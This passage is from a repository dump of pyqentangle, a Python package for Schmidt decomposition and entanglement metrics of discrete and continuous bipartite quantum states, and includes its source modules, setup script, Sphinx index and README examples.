with each elements the coefficients for :math:`|ij\\\\rangle`\n :param kept: subsystem, 0 indicating the first subsystem; 1 the second\n :return: reduced density matrix of the specified subsystem\n :type bipartitepurestate_tensor: numpy.ndarray\n :type kept: int\n :rtype: numpy.ndarray\n\n \"\"\"\n if not (kept in [0, 1]):\n raise ValueError('kept can only be 0 or 1!')\n return bipartitepurestate_reduceddensitymatrix_nocheck(bipartitepurestate_tensor, kept)\n\n\ndef schmidt_decomposition(bipartitepurestate_tensor):\n \"\"\"Calculate the Schmidt decomposition of the given discrete bipartite quantum system\n\n Given a discrete normalized quantum system, given in terms of 2-D numpy array ``bipartitepurestate_tensor``,\n each element of ``bipartitepurestate_tensor[i, j]`` is the coefficient of the ket :math:`|ij\\\\rangle`,\n calculate its Schmidt decomposition, returned as a list of tuples, where each tuple contains\n the Schmidt coefficient, the vector of eigenmode of first subsystem, and the vector of the eigenmode of\n second subsystem.\n\n :param bipartitepurestate_tensor: tensor describing the bi-partitite states, with each elements the coefficients for :math:`|ij\\\\rangle`\n :return: list of tuples containing the Schmidt coefficient, eigenmode for first subsystem, and eigenmode for second subsystem\n :type bipartitepurestate_tensor: numpy.ndarray\n :rtype: list\n\n \"\"\"\n state_dims = bipartitepurestate_tensor.shape\n mindim = np.min(state_dims)\n\n vecs1, diags, vecs2_h = np.linalg.svd(bipartitepurestate_tensor)\n vecs2 = vecs2_h.transpose()\n #decomposition = [(diags[k]*diags[k], vecs1[:, k], transposevecs2[:, k])\n # for k in range(mindim)]\n decomposition = [(diags[k], vecs1[:, k], vecs2[:, k])\n for k in range(mindim)]\n\n decomposition = sorted(decomposition, key=lambda dec: dec[0], reverse=True)\n\n return decomposition\n" }, { "alpha_fraction": 0.665901243686676, "alphanum_fraction": 0.6946039199829102, "avg_line_length": 27.064516067504883, 
"blob_id": "37c2e7985653acbded72ebe8ebea3b5051a7f1d1", "content_id": "0d4e8959828329b1d8da8769276d27ff272ee165", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 871, "license_type": "permissive", "max_line_length": 106, "num_lines": 31, "path": "/doc/index.rst", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": ".. PyQEntangle documentation master file, created by\n sphinx-quickstart on Fri Nov 11 13:36:37 2016.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nWelcome to PyQEntangle's documentation!\n=======================================\n\nThis is the PyQEntangle project, which provides routine to perform Schmidt decomposition\nfor quantum entangled states. The states have to be bipartite, i.e., containing two\nsubsystems. The two subsystems can be either discrete or continuous.\n\nNote: the releases 2.x is incompatible with releases 1.x.\n\nThis package runs in Python 2.7, 3.5, 3.6, and 3.7. However, under Python 3.7, Cython has to be installed.\n\nContents:\n\n.. 
toctree::\n :maxdepth: 2\n\n code\n links\n ref\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n\n" }, { "alpha_fraction": 0.6551980972290039, "alphanum_fraction": 0.6754542589187622, "avg_line_length": 38.95833206176758, "blob_id": "05a5b63426c2793ff480b90182575675e3167c85", "content_id": "1ef22478f7d36ce430d59d1cc385f24a7ca9899b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6714, "license_type": "permissive", "max_line_length": 197, "num_lines": 168, "path": "/pyqentangle/continuous.py", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "\nfrom itertools import product\n\nimport numpy as np\n\nfrom .interpolate_nocheck import numerical_continuous_interpolation_nocheck_cython\nfrom . import schmidt_decomposition\n\ndisentangled_gaussian = lambda x1, x2: np.exp(-0.5 * (x1 * x1 + x2 * x2)) / np.sqrt(np.pi)\n\n\nclass OutOfRangeException(Exception):\n def __init__(self, value):\n self.msg = \"Out of range: \" + str(value)\n\n def __str__(self):\n return repr(self.msg)\n\n\nclass UnequalLengthException(Exception):\n def __init__(self, array1, array2):\n self.msg = \"Unequal length: \" + str(len(array1)) + \" vs. 
\" + str(len(array2))\n\n def __str__(self):\n return repr(self.msg)\n\n\ndef numerical_continuous_interpolation(xarray, yarray, x):\n \"\"\"Evaluate the value of a function given a variable x using interpolation\n\n With a function approximated by given arrays of independent variable (`xarray`)\n and of dependent variable (`yarray`), the value of this function given `x` is\n calculated by interpolation.\n\n If `x` is outside the range of `xarray`, an `OutOfRangeException`\n is raised; if the lengths of `xarray` and `yarray` are not equal, an\n `UnequalLengthException` is raised.\n\n :param xarray: an array of independent variable values\n :param yarray: an array of dependent variable values\n :param x: the input value at where the function is computed at\n :return: the value of function with the given `x`\n :type xarray: numpy.ndarray\n :type yarray: numpy.ndarray\n :rtype: float\n :raises: OutOfRangeException, UnequalLengthException\n \"\"\"\n if len(xarray) != len(yarray):\n raise UnequalLengthException(xarray, yarray)\n minx = np.min(xarray)\n maxx = np.max(xarray)\n if x == maxx:\n return yarray[-1]\n if not (x >= minx and x < maxx):\n raise OutOfRangeException(x)\n\n return numerical_continuous_interpolation_nocheck_cython(xarray, yarray, x)\n\n\ndef numerical_continuous_function(xarray, yarray):\n \"\"\"Return a function with the given arrays of independent and dependent variables\n\n With a function approximated by given arrays of independent variable (`xarray`)\n and of dependent variable (`yarray`), it returns a lambda function that takes\n a `numpy.ndarray` as an input and calculates the values at all these elements\n using interpolation.\n\n If `x` is outside the range of `xarray`, an `OutOfRangeException`\n is raised.\n\n :param xarray: an array of independent variable values\n :param yarray: an array of dependent variable values\n :return: a lambda function that takes a `numpy.ndarray` as the input parameter and calculate the values\n :type xarray: 
numpy.ndarray\n :type yarray: numpy.ndarray\n :rtype: function\n :raises: OutOfRangeException\n \"\"\"\n return lambda xs: np.array(list(map(lambda x: numerical_continuous_interpolation(xarray, yarray, x), xs)))\n\n\ndef discretize_continuous_bipartitesys(fcn, x1_lo, x1_hi, x2_lo, x2_hi, nb_x1=100, nb_x2=100):\n \"\"\"Find the discretized representation of the continuous bipartite system\n\n Given a function `fcn` (a function with two input variables),\n find the discretized representation of the bipartite system, with\n the first system ranges from `x1_lo` to `x1_hi`, and second from `x2_lo` to `x2_hi`.\n\n :param fcn: function with two input variables\n :param x1_lo: lower bound of :math:`x_1`\n :param x1_hi: upper bound of :math:`x_1`\n :param x2_lo: lower bound of :math:`x_2`\n :param x2_hi: upper bound of :math:`x_2`\n :param nb_x1: number of :math:`x_1` (default: 100)\n :param nb_x2: number of :math:`x_2` (default: 100)\n :return: discretized tensor representation of the continuous bipartite system\n :type fcn: function\n :type x1_lo: float\n :type x1_hi: float\n :type x2_lo: float\n :type x2_hi: float\n :type nb_x1: int\n :type nb_x2: int\n :rtype: numpy.ndarray\n\n \"\"\"\n x1 = np.linspace(x1_lo, x1_hi, nb_x1)\n x2 = np.linspace(x2_lo, x2_hi, nb_x2)\n tensor = np.zeros((len(x1), len(x2)))\n for i, j in product(*map(range, tensor.shape)):\n tensor[i, j] = fcn(x1[i], x2[j])\n return tensor\n\n\ndef continuous_schmidt_decomposition(fcn, x1_lo, x1_hi, x2_lo, x2_hi, nb_x1=100, nb_x2=100, keep=None):\n \"\"\"Compute the Schmidt decomposition of a continuous bipartite quantum systems\n\n Given a function `fcn` (a function with two input variables), perform the Schmidt\n decomposition, returning a list of tuples, where each contains a Schmidt decomposition,\n the lambda function of the eigenmode in the first subsystem, and the lambda function\n of the eigenmode of the second subsystem.\n\n :param fcn: function with two input variables\n :param x1_lo: lower bound 
of :math:`x_1`\n :param x1_hi: upper bound of :math:`x_1`\n :param x2_lo: lower bound of :math:`x_2`\n :param x2_hi: upper bound of :math:`x_2`\n :param nb_x1: number of :math:`x_1` (default: 100)\n :param nb_x2: number of :math:`x_2` (default: 100)\n :param keep: the number of Schmidt modes with the largest coefficients to return; the smaller of `nb_x1` and `nb_x2` will be returned if `None` is given. (default: `None`)\n :return: list of tuples, where each contains a Schmidt coefficient, the lambda function of the eigenmode of the first subsystem, and the lambda function of the eigenmode of the second subsystem\n :type fcn: function\n :type x1_lo: float\n :type x1_hi: float\n :type x2_lo: float\n :type x2_hi: float\n :type nb_x1: int\n :type nb_x2: int\n :type keep: int\n :rtype: list\n\n \"\"\"\n tensor = discretize_continuous_bipartitesys(fcn, x1_lo, x1_hi, x2_lo, x2_hi, nb_x1=nb_x1, nb_x2=nb_x2)\n decomposition = schmidt_decomposition(tensor)\n\n if keep == None or keep > len(decomposition):\n keep = len(decomposition)\n\n x1array = np.linspace(x1_lo, x1_hi, nb_x1)\n x2array = np.linspace(x2_lo, x2_hi, nb_x2)\n dx1 = (x1_hi - x1_lo) / (nb_x1 - 1.)\n dx2 = (x2_hi - x2_lo) / (nb_x2 - 1.)\n\n renormalized_decomposition = []\n #s = list(map(lambda item: item[0], decomposition))\n sumeigvals = np.sum(list(map(lambda dec: dec[0], decomposition)))\n #sumeigvals = np.sum(list(map(lambda i: s[i]**2, range(keep))))\n for i in range(keep):\n schmidt_weight, unnorm_modeA, unnorm_modeB = decomposition[i]\n normA = np.linalg.norm(unnorm_modeA) * np.sqrt(dx1)\n normB = np.linalg.norm(unnorm_modeB) * np.sqrt(dx2)\n renormalized_decomposition.append(\n ( (schmidt_weight / sumeigvals),\n numerical_continuous_function(x1array, unnorm_modeA / normA),\n numerical_continuous_function(x2array, unnorm_modeB / normB)\n )\n )\n\n return renormalized_decomposition\n" }, { "alpha_fraction": 0.6909643411636353, "alphanum_fraction": 0.698177695274353, "avg_line_length": 35.0684928894043, 
"blob_id": "37f26b28c8ddd957a9cc29044fc058e4f2467316", "content_id": "200014dccf4ddb68c518ef941546d8e71533ced4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2634, "license_type": "permissive", "max_line_length": 152, "num_lines": 73, "path": "/pyqentangle/metrics.py", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nfrom .negativity_utils import bipartitepurestate_partialtranspose_subsys0_densitymatrix_cython\nfrom .negativity_utils import bipartitepurestate_partialtranspose_subsys1_densitymatrix_cython\nfrom .bipartite_denmat import flatten_bipartite_densitymatrix_cython\n\n\ndef schmidt_coefficients(schmidt_modes):\n \"\"\" Retrieving Schmidt coefficients from Schmidt modes.\n\n :param schmidt_modes: Schmidt modes\n :return: Schmidt coefficients\n :type schmidt_modes: list\n :rtype: numpy.array\n \"\"\"\n return np.array([mode[0] for mode in schmidt_modes])\n\n\ndef entanglement_entropy(schmidt_modes):\n \"\"\"Calculate the entanglement entropy\n\n Given the calculated Schmidt modes, compute the entanglement entropy\n with the formula :math:`H=-\\\\sum_i p_i \\log p_i`.\n\n :param schmidt_modes: Schmidt modes\n :return: the entanglement entropy\n :type schmidt_modes: list\n :rtype: numpy.float\n\n \"\"\"\n eigenvalues = np.real(schmidt_coefficients(schmidt_modes))\n eigenvalues = np.extract(eigenvalues > 0, eigenvalues)\n entropy = np.sum(- eigenvalues * np.log(eigenvalues))\n return entropy\n\n\n# participation ratio\ndef participation_ratio(schmidt_modes):\n \"\"\"Calculate the participation ratio\n\n Given the calculated Schmidt modes, compute the participation ratio\n with the formula :math:`K=\\\\frac{1}{\\\\sum_i p_i^2}`.\n\n :param schmidt_modes: Schmidt modes\n :return: participation ratio\n :type schmidt_modes: list\n :rtype: numpy.float\n\n \"\"\"\n eigenvalues = np.real(np.real(schmidt_coefficients(schmidt_modes)))\n K = 1. 
/ np.sum(eigenvalues * eigenvalues)\n return K\n\n\n# negativity\ndef negativity(bipartite_tensor):\n \"\"\"Calculate the negativity\n\n Given a normalized bipartite discrete state, compute the negativity\n with the formula :math:`N = \\\\frac{||\\\\rho^{\\Gamma_A}||_1-1}{2}`\n\n :param bipartitepurestate_tensor: tensor describing the bi-partitite states, with each elements the coefficients for :math:`|ij\\\\rangle`\n :return: negativity\n :type bipartitepurestate_tensor: numpy.ndarray\n :rtype: numpy.float\n\n \"\"\"\n dim0, dim1 = bipartite_tensor.shape\n flatten_fullden_pt = flatten_bipartite_densitymatrix_cython(bipartitepurestate_partialtranspose_subsys0_densitymatrix_cython(bipartite_tensor)\n if dim0 < dim1\n else bipartitepurestate_partialtranspose_subsys1_densitymatrix_cython(bipartite_tensor))\n\n eigenvalues = np.linalg.eigvals(flatten_fullden_pt)\n return 0.5 * (np.sum(np.abs(eigenvalues)) - 1)\n" }, { "alpha_fraction": 0.5948041677474976, "alphanum_fraction": 0.6025591492652893, "avg_line_length": 42.71186447143555, "blob_id": "931b35b01b51610b53a2861db081da629567c0f1", "content_id": "67296af8779f737059e07c16ff5ea59dd064abb6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2579, "license_type": "permissive", "max_line_length": 138, "num_lines": 59, "path": "/setup.py", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "from setuptools import setup, Extension\nimport numpy as np\n\n# reference: https://stackoverflow.com/questions/46784964/create-package-with-cython-so-users-can-install-it-without-having-cython-already\ntry:\n from Cython.Build import cythonize\n ext_modules = cythonize(['pyqentangle/interpolate_nocheck.pyx',\n 'pyqentangle/bipartite_reddenmat_nocheck.pyx',\n 'pyqentangle/bipartite_denmat.pyx',\n 'pyqentangle/negativity_utils.pyx'])\nexcept ImportError:\n ext_modules = [Extension('pyqentangle.interpolate_nocheck',\n 
sources=['pyqentangle/interpolate_nocheck.c']),\n Extension('pyqentangle.bipartite_reddenmat_nocheck',\n sources=['pyqentangle/bipartite_reddenmat_nocheck.c']),\n Extension('pyqentangle.bipartite_denmat',\n sources=['pyqentangle/bipartite_denmat.c']),\n Extension('pyqentangle.negativity_utils',\n sources=['pyqentangle/negativity_utils.c'])]\n\n\ndef readme():\n with open('README.md') as f:\n return f.read()\n\n\nsetup(name='pyqentangle',\n version=\"2.0.0\",\n description=\"Quantum Entanglement for Python\",\n long_description=\"Schmidt decomposition for discrete and continuous bi-partite quantum systems\",\n classifiers=[\n \"Topic :: Scientific/Engineering :: Physics\",\n \"Topic :: Scientific/Engineering :: Mathematics\",\n \"Topic :: Scientific/Engineering :: Chemistry\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Cython\",\n \"Programming Language :: C\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Education\"\n ],\n keywords=\"quantum physics Schmidt decompostion entanglement\",\n url=\"https://github.com/stephenhky/pyqentangle\",\n author=\"Kwan-Yuet Ho\",\n author_email=\"[email protected]\",\n license='MIT',\n packages=['pyqentangle'],\n include_dirs=[np.get_include()],\n setup_requires=['Cython', 'numpy', ],\n install_requires=['numpy',],\n tests_require=['unittest2', 'numpy', 'scipy',],\n ext_modules=ext_modules,\n test_suite=\"test\",\n include_package_data=True,\n zip_safe=False)\n" }, { "alpha_fraction": 0.8687782883644104, "alphanum_fraction": 0.8687782883644104, "avg_line_length": 72.33333587646484, "blob_id": "d79d98d55fc4ac290d9160d4229c01d2ec965975", "content_id": "19dd138be631a20ba53de24457576cfca82462eb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": 
false, "language": "Python", "length_bytes": 221, "license_type": "permissive", "max_line_length": 101, "num_lines": 3, "path": "/pyqentangle/__init__.py", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "\nfrom .schmidt import schmidt_decomposition\nfrom .continuous import continuous_schmidt_decomposition, OutOfRangeException, UnequalLengthException\nfrom .metrics import entanglement_entropy, participation_ratio, negativity\n" }, { "alpha_fraction": 0.6320754885673523, "alphanum_fraction": 0.7253369092941284, "avg_line_length": 34.68269348144531, "blob_id": "c6cd8088456555eeb48ae0058327a7f505a0e63f", "content_id": "1382f22139e0f70afae1831345ee96f323803c41", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3710, "license_type": "permissive", "max_line_length": 244, "num_lines": 104, "path": "/README.md", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "# Quantum Entanglement for Python\n\n[![Build Status](https://travis-ci.org/stephenhky/pyqentangle.svg?branch=master)](https://travis-ci.org/stephenhky/pyqentangle)\n[![GitHub release](https://img.shields.io/github/release/stephenhky/pyqentangle.svg?maxAge=3600)](https://github.com/stephenhky/pyqentangle/releases)\n\n## Version\n\nThe releases of `pyqentangle` 2.x.x is incompatible with previous releases.\n\n## Installation\n\nThis package can be installed using `pip`.\n\n```\n>>> pip install -U pyqentangle\n```\n\nTo use it, enter\n\n```\n>>> import pyqentangle\n>>> import numpy as np\n```\n\n## Schmidt Decomposition for Discrete Bipartite States\n\nWe first express the bipartite state in terms of a tensor. 
For example, if the state is `|01>+|10>`, then express it as\n\n```\n>>> tensor = np.array([[0., np.sqrt(0.5)], [np.sqrt(0.5), 0.]])\n```\n\nTo perform the Schmidt decompostion, just enter:\n\n```\n>>> pyqentangle.schmidt_decomposition(tensor)\n[(0.5000000000000001, array([ 0.+0.j, 1.+0.j]), array([ 1.+0.j, 0.+0.j])),\n (0.5000000000000001, array([ 1.+0.j, 0.+0.j]), array([ 0.+0.j, 1.+0.j]))]\n```\n\nFor each tuple in the returned list, the first element is the Schmidt coefficients, the second the component for first subsystem, and the third the component for the second subsystem.\n\n## Schmidt Decomposition for Continuous Bipartite States\n\nWe can perform Schmidt decomposition on continuous systems too. For example, define the following normalized wavefunction:\n\n```\n>>> fcn = lambda x1, x2: np.exp(-((0.5*(x1+x2))**2))*np.exp(-(x1-x2)**2)*np.sqrt(2./np.pi)\n```\n\nThen perform the Schmidt decomposition, \n\n```\n>>> decompositions = pyqentangle.continuous_schmidt_decomposition(fcn, -10., 10., -10., 10., keep=10)\n```\n\nwhere it describes the ranges of x1 and x2 respectively, and `keep=10` specifies only top 10 Schmidt modes are kept. Then we can read the Schmidt coefficients:\n\n```\n>>> list(map(lambda dec: dec[0], decompositions))\n[0.88888888888888884,\n 0.098765432098765565,\n 0.010973936899862853,\n 0.0012193263222069757,\n 0.00013548070246744356,\n 1.5053411385271871e-05,\n 1.6726012650322333e-06,\n 1.8584458500366187e-07,\n 2.0649398326795657e-08,\n 2.2943775912005789e-09]\n```\n\nThe second and the third elements in each tuple in the list `decompositions` are lambda functions for the modes of susbsystems A and B respectively. 
The Schmidt functions can be plotted:\n```\n>>> x1array = np.linspace(-10., 10., 100)\n>>> x2array = np.linspace(-10., 10., 100)\n>>> import matplotlib.pyplot as plt\n>>> # Eigenfunctions of the first Schmidt mode\n>>> plt.plot(x1array, decompositions[0][1](x1array))\n>>> plt.plot(x2array, decompositions[0][2](x2array))\n>>> # Eigenfunctions of the second Schmidt mode\n>>> plt.plot(x1array, decompositions[1][1](x1array))\n>>> plt.plot(x2array, decompositions[1][2](x2array))\n```\n\n![alt](fig/Figure_1A.png)\n\n![alt](fig/Figure_1B.png)\n\n![alt](fig/Figure_2A.png)\n\n![alt](fig/Figure_2B.png)\n\n\n## Useful Links\n\n* Study of Entanglement in Quantum Computers: [https://datawarrior.wordpress.com/2017/09/20/a-first-glimpse-of-rigettis-quantum-computing-cloud/](https://datawarrior.wordpress.com/2017/09/20/a-first-glimpse-of-rigettis-quantum-computing-cloud/)\n* Github page: [https://github.com/stephenhky/pyqentangle](https://github.com/stephenhky/pyqentangle)\n* PyPI page: [https://pypi.python.org/pypi/pyqentangle/](https://pypi.python.org/pypi/pyqentangle/)\n* Documentation: [http://pyqentangle.readthedocs.io/](http://pyqentangle.readthedocs.io/)\n* RQEntangle: [https://CRAN.R-project.org/package=RQEntangle](https://CRAN.R-project.org/package=RQEntangle) (corresponding R library)\n\n## Reference\n* Artur Ekert, Peter L. Knight, \"Entangled quantum systems and the Schmidt decomposition\", *Am. J. Phys.* 63, 415 (1995)." } ]
7
FinisAeternum/rgbSignboard
https://github.com/FinisAeternum/rgbSignboard
e4cdb4a4361769753e75dd2196df12ff314b1cdb
8fbfb682a2b9eaa8393c39b1e28887f92a7e5b3c
231f2033dcd9b1c3a57c87cacab7a398512cbe2f
refs/heads/master
2020-04-08T06:00:44.272175
2018-11-28T04:53:14
2018-11-28T04:53:14
159,082,611
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5209539532661438, "alphanum_fraction": 0.5927157998085022, "avg_line_length": 41.39194107055664, "blob_id": "73de182e0cc0d83ef4cebc672ef2ed03c1edaeb5", "content_id": "b5282e2bc3000f9eab371884ab222d7f09d3a7e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23146, "license_type": "no_license", "max_line_length": 117, "num_lines": 546, "path": "/boardControl.py", "repo_name": "FinisAeternum/rgbSignboard", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport time\nimport random\nimport pyowm\nimport urllib2\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom datetime import datetime\nfrom leagueoflegends import LeagueOfLegends, RiotError\nfrom rgbmatrix import Adafruit_RGBmatrix\n\nmatrix = Adafruit_RGBmatrix(32, 2)\ndegree_sign = u'\\N{DEGREE SIGN}'\nfont7 = ImageFont.truetype(\".DejaVuSans-Bold.ttf\", 7)\nfont8 = ImageFont.truetype(\".DejaVuSans-Bold.ttf\", 8)\nlol = LeagueOfLegends('RGAPI-b71a8fe2-804a-4d13-aab9-5ca9b9bca956')\n# A name dict for all degree measurements of wind to meteorological names (NNW) etc\nWIND_DIRECTION_NAME_DICT = {0: 'N', 10: 'N', 20: 'NNE', 30: 'NNE', 40: 'NE',\n 50: 'NE', 60: 'NE', 70: 'ENE', 80: 'ENE', 90: 'E',\n 100: 'E', 110: 'ESE', 120: 'ESE', 130: 'SE', 140: 'SE',\n 150: 'SE', 160: 'SSE', 170: 'SSE', 180: 'S', 200: 'SSW',\n 190: 'S', 210: 'SSW', 220: 'SW', 230: 'SW', 240: 'SW',\n 250: 'WSW', 260: 'WSW', 270: 'W', 280: 'W', 290: 'WNW',\n 300: 'WNW', 310: 'NW', 320: 'NW', 330: 'NW', 340: 'NNW',\n 350: 'NNW', 360: 'N'}\n\n\ndef get_current_time():\n return str(datetime.now().time().strftime('%H:%M'))\n\n\ndef get_curr_weather_temp(owm):\n get_weather = owm.weather_at_id(5146277)\n curr_weather = get_weather.get_weather()\n return int(round(curr_weather.get_temperature('fahrenheit')['temp']))\n\n\ndef get_curr_weather_wind_speed(owm):\n get_weather = owm.weather_at_id(5146277)\n curr_weather = 
get_weather.get_weather()\n return int(round(curr_weather.get_wind()['speed'] * 2.23694))\n\n\ndef get_curr_weather_wind_direction(owm):\n get_weather = owm.weather_at_id(5146277)\n curr_weather = get_weather.get_weather()\n return int(round(curr_weather.get_wind()['deg'], -1))\n\n\ndef get_league_stats():\n try:\n summoner = lol.get_summoner_by_name(\"Finis Aeternum\")\n print(summoner)\n return summoner\n except urllib2.URLError:\n print(\"League call failed. Proceeding...\")\n\n\ndef get_rand_x():\n randx = random.randint(0, 15)\n return randx\n\n\ndef get_rand_y():\n randy = random.randint(0, 20)\n return randy\n\n\ndef add_temperature_weather_image(image, curr_weather_temp_int):\n \"\"\"Adds temperature to the image supplied.\n\n :param image: The image to add temperature string to\n :param curr_weather_temp_int: The temperature value to add to the image\n \"\"\"\n draw = ImageDraw.Draw(image)\n if curr_weather_temp_int >= 80:\n draw.text((0, 19), str(curr_weather_temp_int) + degree_sign, font=font8, fill=\"#EF3B09\")\n elif curr_weather_temp_int >= 32:\n draw.text((0, 19), str(curr_weather_temp_int) + degree_sign, font=font8, fill=\"#0DBA3E\")\n else:\n draw.text((0, 19), str(curr_weather_temp_int) + degree_sign, font=font8, fill=\"42C5F4\")\n\n\ndef add_small_sun_weather_image(image):\n \"\"\"Adds a small sun to weather display area on signboard.\n\n :param image: image to add the small sun to\n \"\"\"\n draw = ImageDraw.Draw(image)\n draw.ellipse(((41, 1), (53, 13)), fill=\"#FFBB00\")\n\n\ndef add_three_clouds_weather_image(image):\n \"\"\"Adds three clouds to weather display area on signboard.\n\n :param image: image to add three clouds to\n \"\"\"\n draw = ImageDraw.Draw(image)\n # CLOUD 1\n draw.line((42, 3, 43, 3), fill=\"#FFFFFF\")\n draw.line((40, 4, 45, 4), fill=\"#FFFFFF\")\n draw.line((38, 5, 47, 5), fill=\"#FFFFFF\")\n draw.line((37, 6, 48, 6), fill=\"#FFFFFF\")\n draw.line((37, 7, 48, 7), fill=\"#FFFFFF\")\n draw.line((38, 8, 47, 8), 
fill=\"#FFFFFF\")\n draw.line((39, 9, 46, 9), fill=\"#FFFFFF\")\n # CLOUD 2\n draw.line((53, 6, 54, 6), fill=\"#FFFFFF\")\n draw.line((51, 7, 56, 7), fill=\"#FFFFFF\")\n draw.line((49, 8, 58, 8), fill=\"#FFFFFF\")\n draw.line((48, 9, 59, 9), fill=\"#FFFFFF\")\n draw.line((48, 10, 59, 10), fill=\"#FFFFFF\")\n draw.line((49, 11, 58, 11), fill=\"#FFFFFF\")\n draw.line((50, 12, 57, 12), fill=\"#FFFFFF\")\n # TINY CLOUD\n draw.line((51, 2, 52, 2), fill=\"#FFFFFF\")\n draw.line((49, 3, 54, 3), fill=\"#FFFFFF\")\n draw.line((50, 4, 53, 4), fill=\"#FFFFFF\")\n\n\ndef add_two_clouds_weather_image(image):\n \"\"\"Adds two clouds to weather display area on signboard.\n\n :param image: image to add two clouds to\n \"\"\"\n draw = ImageDraw.Draw(image)\n # CLOUD 1\n draw.line((42, 3, 43, 3), fill=\"#FFFFFF\")\n draw.line((40, 4, 45, 4), fill=\"#FFFFFF\")\n draw.line((38, 5, 47, 5), fill=\"#FFFFFF\")\n draw.line((37, 6, 48, 6), fill=\"#FFFFFF\")\n draw.line((37, 7, 48, 7), fill=\"#FFFFFF\")\n draw.line((38, 8, 47, 8), fill=\"#FFFFFF\")\n draw.line((39, 9, 46, 9), fill=\"#FFFFFF\")\n # TINY CLOUD\n draw.line((51, 2, 52, 2), fill=\"#FFFFFF\")\n draw.line((49, 3, 54, 3), fill=\"#FFFFFF\")\n draw.line((50, 4, 53, 4), fill=\"#FFFFFF\")\n\n\ndef add_one_cloud_weather_image(image):\n \"\"\"Adds one cloud to weather display area on signboard.\n\n :param image: image to add cloud to\n \"\"\"\n draw = ImageDraw.Draw(image)\n # TINY CLOUD\n draw.line((51, 2, 52, 2), fill=\"#FFFFFF\")\n draw.line((49, 3, 54, 3), fill=\"#FFFFFF\")\n draw.line((50, 4, 53, 4), fill=\"#FFFFFF\")\n\ndef add_tornado_weather_image(image):\n \"\"\"Adds a tornado to weather display area on signboard.\n\n :param image: image to add tornado to\n \"\"\"\n draw = ImageDraw.Draw(image)\n # TORNADO\n draw.line((40, 1, 54, 1), fill=\"#CCCCCC\")\n draw.line((41, 2, 53, 2), fill=\"#CCCCCC\")\n draw.line((42, 3, 52, 3), fill=\"#CCCCCC\")\n draw.line((43, 4, 51, 4), fill=\"#CCCCCC\")\n draw.line((44, 5, 50, 5), 
fill=\"#CCCCCC\")\n draw.line((44, 6, 50, 6), fill=\"#CCCCCC\")\n draw.line((45, 7, 49, 7), fill=\"#CCCCCC\")\n draw.line((46, 8, 50, 8), fill=\"#CCCCCC\")\n draw.line((47, 9, 49, 9), fill=\"#CCCCCC\")\n draw.line((48, 10, 49, 10), fill=\"#CCCCCC\")\n draw.line((48, 11, 49, 11), fill=\"#CCCCCC\")\n draw.line((48, 12, 49, 12), fill=\"#CCCCCC\")\n draw.point((49, 13), fill=\"#CCCCCC\")\n\n\ndef display_overcast_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_overcast_clouds = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_overcast_clouds)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_overcast_clouds, curr_weather_temp_int)\n draw.text((29, 15), get_curr_weather_wind_speed(owm), font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n add_three_clouds_weather_image(image_overcast_clouds)\n matrix.SetImage(image_overcast_clouds.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_broken_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_broken_clouds = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_broken_clouds)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_broken_clouds, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n add_small_sun_weather_image(image_broken_clouds)\n add_three_clouds_weather_image(image_broken_clouds)\n matrix.SetImage(image_broken_clouds.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_scattered_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_scattered_clouds = Image.new(\"RGB\", (64, 32))\n draw = 
